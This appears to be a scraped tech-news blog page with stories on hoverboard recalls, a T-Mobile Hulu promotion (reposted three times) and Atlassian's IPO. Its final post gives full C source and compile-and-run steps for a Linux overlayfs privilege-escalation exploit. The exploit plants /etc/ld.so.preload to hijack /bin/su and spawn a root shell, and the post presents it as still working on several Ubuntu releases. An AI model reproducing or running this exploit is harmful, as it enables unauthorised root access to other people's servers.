Random Post

Sunday, December 13, 2015
no image

Amazon has pulled some of this holiday season's most popular gifts from its website amid safety concerns, according to reports that surfaced Monday. It apparently stopped selling several brands of electric self-balancing scooters -- aka "hoverboards" -- including the Swagway (pictured above).

The move comes on the heels of last week's news that Delta Airlines, United Airlines and American Airlines no longer would allow the devices on flights, either as carry-ons or in checked luggage.

Reports of fires and even explosions have made headlines in the past month. A now-infamous video captures a hoverboard bursting into flames inside a shopping mall.

The primary culprit is believed to be the devices' lithium-ion batteries, which can overheat quickly, especially if overcharged or overworked.

As a result of these safety concerns, retailers have begun to pull the boards from store shelves. Amazon is not alone in removing some boards from its website. Overstock.com has stopped selling the devices altogether.

However, at press time some retailers -- including Sharper Image and Macy's -- were carrying the boards on their respective websites. Also, at least two brands, Jetson and Razor, were still for sale on Amazon.

Amazon did not respond to our request for further details.

Not on Board

The ubiquitous self-balancing two-wheel scooters rolled out earlier this year and quickly became a breakout phenomenon. Their popularity is due in part to manufacturers opting to dub them "hoverboards" -- an effort to borrow some steam from the fictional flying boards featured in Back to the Future II, which just happened to be set in November 2015.

As boards that actually fly or even hover are still mostly in the realm of fiction, these two-wheeled devices have filled the void.

Hoverboards have become one of this holiday season's "must have" devices as a result, and sales have been brisk even as safety concerns have continued to mount.

"While hoverboards can be fun, they also carry risks and hidden dangers as we've recently discovered," said Susan Schreiner, principal analyst at C4 Trends.

"The publicity of fires has certainly caught the attention of those considering giving a hoverboard for a holiday gift," she told the E-Commerce Times.

Battery on Board

Unlike past holiday gift crazes, the boards are not the brainchild of one company. Several firms -- mostly from China -- are marketing products that are very similar in design. These self-balancing two-wheeled scooters utilize a gyroscope that allows the rider to stay upright and even perform basic tricks.

In most cases, the problems associated with these devices aren't technically with the actual boards -- rather they're with the power source that drives the motor.

"Apparently there are battery issues," said Roger Kay, principal analyst at Endpoint Technologies Associates.

Lithium-ion batteries can be dangerous due to the heat they give off; if excessive, it can cause a fire. For this reason, commercial airlines already have banned lithium-ion batteries in checked luggage, and shipping companies have set guidelines on those that are transported in bulk by air.

Current demand for hoverboard products may have resulted in poor quality control, so some batteries may be a problem while others are reasonably safe. Past problems with lithium-ion batteries have led to product recalls and redesigns.

"In the PC business, when a bad battery batch or poor matchup between a battery and other components occurred, it's boiled down to throwing out the batch or re-engineering the product, which has taken a cycle or two," Kay told the E-Commerce Times.

Lack of Standards

The problem for consumers is that it can be almost impossible to know whether the battery may or may not be an issue. Many batteries may be pushed beyond what would be considered safe.

"There is no standard with these devices right now," warned Chris Byrne, content director for TimetoPlayMag.com.

"The U.S. Consumer Product Safety Commission has started an investigation, but they have not set guidelines," he told the E-Commerce Times.

"Many products have warnings that say, 'not for kids weighing 50 pounds or more,' yet there is nothing like this for the hoverboards," he added.

As a result, the motor might work harder when older kids or adults ride the boards, which could cause the battery to overheat, resulting in a fire.

"I could suggest that people look at the guidelines -- but these don't exist, as there is no testing standard," Byrne noted.

Use at Your Own Risk

This holiday's must-have product could be product debacle of the year.

"The idea that this could smolder on a plane is worrisome, so that is going to hurt sales," suggested Byrne.

Because the issue appears to be with batteries -- not the actual product -- consumers may want to seek out more well-known and established brands if they are determined to hover around the holidays.

"It seems as if several brands have been identified as 'safe,' such as Razor and Jetson," said Schreiner.

However, for those with concerns, the best advice could be to "avoid the product until the industry gets this ironed out," suggested Kay. "Hold off -- at least this season."

Peter Suciu is a freelance writer who has covered consumer electronics, technology, electronic entertainment and fitness-related trends for more than a decade. His work has appeared in more than three dozen publications, and he is the co-author of Careers in the Computer Game Industry (Career in the New Economy series), a career guide aimed at high school students from Rosen Publishing. You can connect with Peter on Google+.

11:05 AM

Amazon has pulled some of this holiday season's most popular gifts from its website amid safety concerns, according to reports t...

Read more »
no image
T-Mobile Sets Hulu Lure to Snag Verizon Customers

T-Mobile last week introduced its latest promotion aimed at attracting subscribers from rival mobile phone carriers: 12 months of Hulu streaming service for Verizon customers who switch to T-Mobile.

The promotion, which the company called the fourth gift in its series of holiday surprises, follows previous attempts to lure customers. Last month it offered Simple Choice subscribers three months of Unlimited LTE, then it offered Sprint subscribers US$200 to switch. The most recent promotion gave AT&T customers who switched a phone memory upgrade and half off accessories.

In addition to a year's worth of Hulu service, T-Mobile will give Verizon customers who switch up to $125 off in-store accessories such as smartwatches, speakers, fitness trackers and headphones.

"Verizon customers put up with a lot of sneaky tricks from Big Red these days: overpriced data, shocking overage penalties and no early upgrade option -- just to name a few," T-Mobile CEO John Legere said.

"We are going to show their customers why the Un-carrier is better with a real gift: half-off the best accessories and a full year of Hulu that comes with unlimited LTE streaming with Binge On at T-Mobile," he added.

Mobile Viewing

The promotion is directed at mobile viewing, and while it specifically called out viewing habits on Hulu, it could be seen as a countermove aimed at addressing Verizon's recently launched video service.

"Hulu is very much responding to go90," said Joel Espelien, senior analyst at The Diffusion Group. "That service is Hulu-esque, and its content is meant to appeal to the millennial audience."

While go90 is available across all the carriers, it is seen as a Verizon service, which is something T-Mobile may understand, he told the E-Commerce Times.

Bundled Offering

Video could help lure in that youth market, but T-Mobile's connection to Hulu also could help as other carriers launch services or leverage their video options. Both AT&T and Verizon are already in the pay-TV business.

"It is not that T-Mobile is thinking it has to have a video bundle, but T-Mobile doesn't want to be left out without one," said Espelien.

"They are in a position where they have to bundle a third-party service as a way to level the playing field," he suggested.

Un-Carrier Promotions

While the promotion may be in part about ensuring that T-Mobile has similar offerings to its rivals, it's primarily about enticing Verizon customers to make the switch.

"Ultimately, any of these promotions boil down to trying to get customers," said Abel Nevarez, analyst in the mobile group at IHS Technology.

"Verizon customers have the network on their side, so T-Mobile is looking to attract customers with other options, including its music service," he told the E-Commerce Times.

"This is a play for younger customers, and so far these promotions have been good for attracting customers, so they work on some level," Nevarez added. "These aren't just gimmicks, as we are seeing that they are resonating with customers."

Hulu's Attraction

The video service could be a good option because it's established enough that people know it yet might not subscribe to it.

"Hulu is something that most millennials may have heard of, so this is pretty clever because something with lower brand awareness might not have been known, and Netflix is something they're already using," said Espelien.

It could take promotions like this to get anyone to seriously consider changing carriers.

"Churn is really, really low in the U.S. wireless industry, which is also saturated, so this is why you do see this sort of pouching going on," added Espelien.

Gift Worthy?

T-Mobile noted that this is the fourth promotion in its Un-carrier Unwrapped surprises, but compared to the others it may be more of a stocking stuffer.

"We have to look at the offer in combination with the various accessories that it is offering," said Roger Entner, principal analyst at Recon Analytics.

"T-Mobile has basically offered a $200 discount to Sprint subscribers, but this is a free year of a service that customers might not want, so that feels pretty Grinch-like," he told the E-Commerce Times.

"To get the full advantage of the offering if you are a Verizon customer, you have to buy something on top of it," he added. "It is certainly less generous than the offers they had before."

About the Networks

T-Mobile needs to offer such promotions because Verizon offers better nationwide coverage, according to Entner.

"T-Mobile is expanding its network, and they are working really hard," he said.

"If you are in Manhattan or Boston, as well as most cities, T-Mobile isn't really that different, but the moment you go out further, Verizon and AT&T hold up much better," Entner added. "T-Mobile knows that coverage remains the sore point, so they're addressing it where they can, and in the meantime they'll offer you goodies."

Peter Suciu is a freelance writer who has covered consumer electronics, technology, electronic entertainment and fitness-related trends for more than a decade. His work has appeared in more than three dozen publications, and he is the co-author of Careers in the Computer Game Industry (Career in the New Economy series), a career guide aimed at high school students from Rosen Publishing. You can connect with Peter on Google+.

9:07 AM

T-Mobile last week introduced its latest promotion aimed at attracting subscribers from rival mobile phone carriers: 12 months of H...

Read more »
no image
T-Mobile Sets Hulu Lure to Snag Verizon Customers

T-Mobile last week introduced its latest promotion aimed at attracting subscribers from rival mobile phone carriers: 12 months of Hulu streaming service for Verizon customers who switch to T-Mobile.

The promotion, which the company called the fourth gift in its series of holiday surprises, follows previous attempts to lure customers. Last month it offered Simple Choice subscribers three months of Unlimited LTE, then it offered Sprint subscribers US$200 to switch. The most recent promotion gave AT&T customers who switched a phone memory upgrade and half off accessories.

In addition to a year's worth of Hulu service, T-Mobile will give Verizon customers who switch up to $125 off in-store accessories such as smartwatches, speakers, fitness trackers and headphones.

"Verizon customers put up with a lot of sneaky tricks from Big Red these days: overpriced data, shocking overage penalties and no early upgrade option -- just to name a few," T-Mobile CEO John Legere said.

"We are going to show their customers why the Un-carrier is better with a real gift: half-off the best accessories and a full year of Hulu that comes with unlimited LTE streaming with Binge On at T-Mobile," he added.

Mobile Viewing

The promotion is directed at mobile viewing, and while it specifically called out viewing habits on Hulu, it could be seen as a countermove aimed at addressing Verizon's recently launched video service.

"Hulu is very much responding to go90," said Joel Espelien, senior analyst at The Diffusion Group. "That service is Hulu-esque, and its content is meant to appeal to the millennial audience."

While go90 is available across all the carriers, it is seen as a Verizon service, which is something T-Mobile may understand, he told the E-Commerce Times.

Bundled Offering

Video could help lure in that youth market, but T-Mobile's connection to Hulu also could help as other carriers launch services or leverage their video options. Both AT&T and Verizon are already in the pay-TV business.

"It is not that T-Mobile is thinking it has to have a video bundle, but T-Mobile doesn't want to be left out without one," said Espelien.

"They are in a position where they have to bundle a third-party service as a way to level the playing field," he suggested.

Un-Carrier Promotions

While the promotion may be in part about ensuring that T-Mobile has similar offerings to its rivals, it's primarily about enticing Verizon customers to make the switch.

"Ultimately, any of these promotions boil down to trying to get customers," said Abel Nevarez, analyst in the mobile group at IHS Technology.

"Verizon customers have the network on their side, so T-Mobile is looking to attract customers with other options, including its music service," he told the E-Commerce Times.

"This is a play for younger customers, and so far these promotions have been good for attracting customers, so they work on some level," Nevarez added. "These aren't just gimmicks, as we are seeing that they are resonating with customers."

Hulu's Attraction

The video service could be a good option because it's established enough that people know it yet might not subscribe to it.

"Hulu is something that most millennials may have heard of, so this is pretty clever because something with lower brand awareness might not have been known, and Netflix is something they're already using," said Espelien.

It could take promotions like this to get anyone to seriously consider changing carriers.

"Churn is really, really low in the U.S. wireless industry, which is also saturated, so this is why you do see this sort of pouching going on," added Espelien.

Gift Worthy?

T-Mobile noted that this is the fourth promotion in its Un-carrier Unwrapped surprises, but compared to the others it may be more of a stocking stuffer.

"We have to look at the offer in combination with the various accessories that it is offering," said Roger Entner, principal analyst at Recon Analytics.

"T-Mobile has basically offered a $200 discount to Sprint subscribers, but this is a free year of a service that customers might not want, so that feels pretty Grinch-like," he told the E-Commerce Times.

"To get the full advantage of the offering if you are a Verizon customer, you have to buy something on top of it," he added. "It is certainly less generous than the offers they had before."

About the Networks

T-Mobile needs to offer such promotions because Verizon offers better nationwide coverage, according to Entner.

"T-Mobile is expanding its network, and they are working really hard," he said.

"If you are in Manhattan or Boston, as well as most cities, T-Mobile isn't really that different, but the moment you go out further, Verizon and AT&T hold up much better," Entner added. "T-Mobile knows that coverage remains the sore point, so they're addressing it where they can, and in the meantime they'll offer you goodies."

Peter Suciu is a freelance writer who has covered consumer electronics, technology, electronic entertainment and fitness-related trends for more than a decade. His work has appeared in more than three dozen publications, and he is the co-author of Careers in the Computer Game Industry (Career in the New Economy series), a career guide aimed at high school students from Rosen Publishing. You can connect with Peter on Google+.

9:06 AM

T-Mobile last week introduced its latest promotion aimed at attracting subscribers from rival mobile phone carriers: 12 months of H...

Read more »
no image
T-Mobile Sets Hulu Lure to Snag Verizon Customers

T-Mobile last week introduced its latest promotion aimed at attracting subscribers from rival mobile phone carriers: 12 months of Hulu streaming service for Verizon customers who switch to T-Mobile.

The promotion, which the company called the fourth gift in its series of holiday surprises, follows previous attempts to lure customers. Last month it offered Simple Choice subscribers three months of Unlimited LTE, then it offered Sprint subscribers US$200 to switch. The most recent promotion gave AT&T customers who switched a phone memory upgrade and half off accessories.

In addition to a year's worth of Hulu service, T-Mobile will give Verizon customers who switch up to $125 off in-store accessories such as smartwatches, speakers, fitness trackers and headphones.

"Verizon customers put up with a lot of sneaky tricks from Big Red these days: overpriced data, shocking overage penalties and no early upgrade option -- just to name a few," T-Mobile CEO John Legere said.

"We are going to show their customers why the Un-carrier is better with a real gift: half-off the best accessories and a full year of Hulu that comes with unlimited LTE streaming with Binge On at T-Mobile," he added.

Mobile Viewing

The promotion is directed at mobile viewing, and while it specifically called out viewing habits on Hulu, it could be seen as a countermove aimed at addressing Verizon's recently launched video service.

"Hulu is very much responding to go90," said Joel Espelien, senior analyst at The Diffusion Group. "That service is Hulu-esque, and its content is meant to appeal to the millennial audience."

While go90 is available across all the carriers, it is seen as a Verizon service, which is something T-Mobile may understand, he told the E-Commerce Times.

Bundled Offering

Video could help lure in that youth market, but T-Mobile's connection to Hulu also could help as other carriers launch services or leverage their video options. Both AT&T and Verizon are already in the pay-TV business.

"It is not that T-Mobile is thinking it has to have a video bundle, but T-Mobile doesn't want to be left out without one," said Espelien.

"They are in a position where they have to bundle a third-party service as a way to level the playing field," he suggested.

Un-Carrier Promotions

While the promotion may be in part about ensuring that T-Mobile has similar offerings to its rivals, it's primarily about enticing Verizon customers to make the switch.

"Ultimately, any of these promotions boil down to trying to get customers," said Abel Nevarez, analyst in the mobile group at IHS Technology.

"Verizon customers have the network on their side, so T-Mobile is looking to attract customers with other options, including its music service," he told the E-Commerce Times.

"This is a play for younger customers, and so far these promotions have been good for attracting customers, so they work on some level," Nevarez added. "These aren't just gimmicks, as we are seeing that they are resonating with customers."

Hulu's Attraction

The video service could be a good option because it's established enough that people know it yet might not subscribe to it.

"Hulu is something that most millennials may have heard of, so this is pretty clever because something with lower brand awareness might not have been known, and Netflix is something they're already using," said Espelien.

It could take promotions like this to get anyone to seriously consider changing carriers.

"Churn is really, really low in the U.S. wireless industry, which is also saturated, so this is why you do see this sort of pouching going on," added Espelien.

Gift Worthy?

T-Mobile noted that this is the fourth promotion in its Un-carrier Unwrapped surprises, but compared to the others it may be more of a stocking stuffer.

"We have to look at the offer in combination with the various accessories that it is offering," said Roger Entner, principal analyst at Recon Analytics.

"T-Mobile has basically offered a $200 discount to Sprint subscribers, but this is a free year of a service that customers might not want, so that feels pretty Grinch-like," he told the E-Commerce Times.

"To get the full advantage of the offering if you are a Verizon customer, you have to buy something on top of it," he added. "It is certainly less generous than the offers they had before."

About the Networks

T-Mobile needs to offer such promotions because Verizon offers better nationwide coverage, according to Entner.

"T-Mobile is expanding its network, and they are working really hard," he said.

"If you are in Manhattan or Boston, as well as most cities, T-Mobile isn't really that different, but the moment you go out further, Verizon and AT&T hold up much better," Entner added. "T-Mobile knows that coverage remains the sore point, so they're addressing it where they can, and in the meantime they'll offer you goodies."

Peter Suciu is a freelance writer who has covered consumer electronics, technology, electronic entertainment and fitness-related trends for more than a decade. His work has appeared in more than three dozen publications, and he is the co-author of Careers in the Computer Game Industry (Career in the New Economy series), a career guide aimed at high school students from Rosen Publishing. You can connect with Peter on Google+.

8:14 AM

T-Mobile last week introduced its latest promotion aimed at attracting subscribers from rival mobile phone carriers: 12 months of H...

Read more »
no image

Atlassian last week exceeded expectations with its initial public offering, beginning trading at more than US$27 per share, about 30 percent higher than the $21 issue price.

That means the company -- trading under the ticker "TEAM" -- was valued at about $5.6 billion Thursday.

Atlassian's shares closed at $27.78.

The company, founded in 2002, is best known for its Jira and HipChat products.

It has been profitable for the past 10 years. Code.org and The Daily Telegraph are among the 50,000 organizations in 160 countries using its products.

Going public won't change Atlassian's fiscally conservative ways. "We've always been focused on the long term, and fiscal responsibility goes hand in hand with that mindset," company president Jay Simons said.

"Transitioning to a public company won't change that mindset," he told the E-Commerce Times.

What Atlassian Offers

Other Atlassian's products include Confluence, FishEye, Crucible and Bamboo.

The company charges $10 a year for up to 10 users on Jira Software, Jira Core, Capture for Jira, Confluence, HipChat Server, Team Calendars for Confluence and Bitbucket Server. That $10 gets 50 users on Crowd, 10 committers and five repositories on FishEye, five users on Crucible, up to three agents on Jira Service Desk, and 10 plans and unlimited local agents on Bamboo.

Server licenses are perpetual except for HipChat Server, which is an annual term license starting at $10 for 10 users.

Atlassian's Business Model

In addition to its flat pricing structure, the company uses an e-commerce model and doesn't have a sales or marketing team.

"We've always believed great products sell themselves, so we've decided to make deep investments in R&D to allow us to deliver great products our users love," Simons said.

"Our products ... make a huge impact on [users'] organizations, and when something transforms your work for the better, you use it, you share it, and you take it with you to your next company," he continued. "We think [that approach] will take us to the next level."

Now the company has gone public, it's subject to the demands of Wall Street, pointed out Mike Jude, a program manager at Frost & Sullivan.

"It won't be good enough to just be profitable," he told the E-Commerce Times. "They will have to increase profitability over time. This will require more innovation and a focus on growth."

Swimming Against a Dismal Tide

This has been the worst year for venture capital-backed IPOs since 2010, according to Fortune. To date, 79 VC-backed firms have raised $9.2 billion in the United States, including the $462 million Atlassian raised.

Compare that to last year, when 117 companies amassed $15.5 billion, or 2011, when 50 companies raised $10.44 billion.

Atlassian did well because "they're printing green ink and lots of it," ventured Laura DiDio, a research director at Strategy Analytics.

"The company's profitable ... in stark contrast to many other highly touted IPOs from the dot-com era to the present day," she told the E-Commerce Times. It has more than 5 million monthly active users and a "very impressive client roster of Fortune 1,000 accounts, including Visa, Facebook, Salesforce and eBay."

Atlassian's success is an object lesson for companies seeking to go public, Frost's Jude suggested.

"Generic ideas don't resonate anymore, but good ideas do," he said. "The way you prove you have a good idea is to make money. That's what tech companies need to understand."

Challenges Ahead

Atlassian will have to be more image conscious and marketing driven, DiDio predicted.

"As long as Atlassian continues to succeed, it will only have to make minimal changes to its strategy," she said, but "it will be facing a lot of scrutiny regarding its technology, business and financial decisions and be second-guessed and have its partnerships, alliances and marketing initiatives analyzed or criticized."

Richard Adhikari has written about high-tech for leading industry publications since the 1990s and wonders where it's all leading to. Will implanted RFID chips in humans be the Mark of the Beast? Will nanotech solve our coming food crisis? Does Sturgeon's Law still hold true? You can connect with Richard on Google+.

3:34 AM

Atlassian last week exceeded expectations with its initial public offering, beginning trading at more than US$27 per share, about 30...

Read more »
Friday, December 11, 2015
no image

I will show you how hackers gain root access to your Linux VPS server. This exploit still working nowadays.
The process will be explained with details following this demo:
First: Create a C file "privilege_escalation.c

put this code in the file:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
static char child_stack[1024*1024];
static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);
    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}
int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
    fprintf(stderr,"spawning threads\n");
    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");
        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
            waitpid(pid, &status, 0);
        }
        waitpid(init, &status, 0);
        return 0;
    }
    usleep(300000);
    wait(NULL);
    fprintf(stderr,"child threads done\n");
    fd = open("/etc/ld.so.preload",O_WRONLY);
    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }
    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
Second Step : Compile and Build the program :
To create the executable run this command:
user@ubuntu-server-1504:~$ gcc privilege_escalation.c -o privilege_escalation
 This will make an executable program  called privilege_escalation..

Final Step :  Get  access to shell As root (running the exploit)

execute the exploit by this command:
user@ubuntu-server-1504:~$ ./privilege_escalation

This will generate a root terminal.
This exploit works on Ubuntu 12.04, 14.04, 14.10, 15.04


12:29 PM

I will show you how hackers gain root access to your Linux VPS server. This exploit still working nowadays. The process will be e...

Read more »
Thursday, December 10, 2015
 
Google Analytics Alternative